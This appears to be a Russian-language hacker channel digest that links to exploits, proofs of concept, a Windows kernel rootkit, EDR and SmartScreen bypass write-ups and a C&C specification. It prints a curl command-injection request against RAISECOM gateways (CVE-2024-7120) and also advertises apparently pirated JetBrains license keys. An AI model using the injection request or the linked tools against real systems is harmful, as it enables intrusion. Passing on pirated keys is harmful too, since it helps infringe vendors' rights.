TuDoor
*
Только не королевская династия, я скорее династия DNS.
В общем к сути, собралась как то в Окледе (богоспасаемые штаты) группа хитрых азиатов.
Слово за слово, все скатилось к перечитыванию RFC и трудов Дэна Камински (мир праху его),
основной тезис которого как известно гласит, пойди и отрави DNS ближнего своего.
Ну и как водится дочитались до дыр в BIND, PowerDNS и Microsoft DNS и всего сопутствующего.
*
Рекомендую к осмыслению саму страничку и линки внизу.
Среда чюваки

#DNS #DOS #cachepoison

Прекрасное 🤣

#nightHumor

CVE-2024-7120 RAISECOM Gateway Devices
*
WriteUp
*
Exploit command injection

curl 'http://<TARGET_IP>/vpn/list_base_config.php?type=mod&parts=base_config&template=`<INJECTED_SHELL_COMMAND>`' \
  -H 'Accept: */*' \
  -H 'Accept-Encoding: gzip, deflate' \
  -H 'Connection: keep-alive'

WhatsApp extension manipulation
*
Что с телегой, что вацапом, это даже комментировать не хочется, когда юзер сам ставит APK и дает ему разрешения.
Когда там последний zeroClick был, 2 года назад ? )
*
POC

#FU

CVE-2024-36401 GeoServer
*
POC мы уже публиковали, но тут прям fullH0use
*
Полный exploit + модуль для Mass Scanning
*
Download exploit

JetBrains Keys
*
Ключи истекают 14 сентября 2026 г.
*
ВСЕ ПРОДУКТЫ !!!
*
Link

Windows AppLocker Driver (appid.sys)
*
LPE
*
exploit

#windows #lpe

#history #humor

shadow-rs
*
Windows Kernel Rootkit
*
Лангуаге: RUST
*
link

#rootkit #windows #rust

А вы читали когда либо спецификации на C&C ? 👍
*
Документ серьезный, даже RFC присутствует
*
Open Source C&C Specification

SLUBStick - атака на кэш ядра linux
*
Суть атаки сводится к перекрестному кэшированию ядра, перетекает из limited heap в возможность произвольного чтения и записи в памяти (а это LPE и escape docker).
Затестили на: ядра 5.9 и 6.2 _ x32/x64
Но то ладно, интересно другое, использовались 9 CVE -)
Но то ладно, защита ядер SMEP/SMAP/KASLR - в упор не видят атаки -)
*
В конце августа, будет конфа, где обещают всем участникам в гостиничном номере на подушку положат не шоколадку, а POC exploit
*
За то зарелизили сочный хрустящий PDF с жирным тех анализом и возможностью применения
*
Жирный хрустящий slubstick.pdf


#linux #vuln

Linux для пращуров и внуков и пенсионеров
*
OSEDUCONF - 2022 год
*
глянуть

#real_bad_ass

Атака на EDR
*
Часть 1
Часть 2
Часть 3

#edr

SmartScreen - четыре новых метода по демонтажу
*
writeUP
*
repo

бгг
systemctl --revert-mylast-fuckup


#MUhumor

Apache OfBiz vulns
*
Полный набор: POCов, RCEёв, CURLов, Burpсьютов
(CVE-2024-32113 CVE-2024-36104 CVE-2024-38856)
*
// lInK*/

#apache

CVE-2024-6782
*
Caliber 6.9.0 ~ 7.14.0 remote code execution
*
exploit

GhostWrite уязвимость CPU
*
Ну если совсем коротко то: атака нарушает все что можно, песочница/контейнер/виртуальные машины.
GhostWrite записывает и читает произвольную физическую память на затронутых ЦП RISC-V
*
ЗаБилдить:

gcc -march="rv64gvzve64x" ghostwrite.c -o ghostwrite

*
POC exploit
*
WriteUp wtf

#kernel #cpu

Bug Bounty hunting КУРС
*
download